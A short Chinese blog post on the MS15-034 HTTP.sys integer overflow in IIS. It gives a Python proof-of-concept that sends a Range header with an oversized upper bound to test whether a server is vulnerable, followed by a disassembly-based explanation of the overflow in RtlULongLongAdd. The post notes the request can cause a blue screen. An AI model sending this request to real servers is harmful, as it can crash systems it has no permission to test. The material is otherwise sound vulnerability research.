MS15-034 HTTP.sys 远程执行代码 2015-09-16 阅读次数：

现在最多造成蓝屏

POC

import socket

import random

ipAddr ="WebSite"

hexAllFfff ="18446744073709551615"

count=0

req1 ="GET/ HTTP/1.0\r\n\r\n"

req ="GET/ HTTP/1.1\r\nHost: stuff\r\nRange: bytes="+str(count)+"-"+ hexAllFfff +"\r\n\r\n"

print "[*] Audit Started"

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req1)

boringResp = client_socket.recv(1024)

if "Microsoft" not in boringResp:

print "[*] Not IIS"

exit(0)

client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req)

goodResp = client_socket.recv(1024)

if "Requested Range Not Satisfiable" in goodResp:

print "[!!] Looks VULN"

elif " The request has an invalid header name" in goodResp:

print "[*] Looks Patched"

else:

print "[*] Unexpected response, cannot discern patch status"

print goodResp

**
**

漏洞原理：

HTTP.sys 在处理内核缓存数据时，

**
**

8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1); here**
**

**
**

eax1 = eax - edi

ecx1 = ecx - edx

RtlULongLongAdd (eax1, ecx1)

**
**

其中 eax1 与 ecx1 是处理 HTTP 请求中

Range: bytes="+offsetlow+"-"+offsethigh+"\r\n\r\n"

当offsetlow = 0 ,offsethigh= 0xFFFFFFFFFFFFFFFF

时经过 RtlULongLongAdd 操作

0xFFFFFFFFFFFFFFFF+ 0 + 1 = 0 造成整数溢出